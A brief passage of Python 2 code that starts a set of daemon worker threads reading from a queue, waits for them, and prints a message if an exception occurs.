for i in range(m_count):
t = ThreadNum(queue)
t.setDaemon(True)
t.start()
t_join(m_count)
except Exception,e:
print msg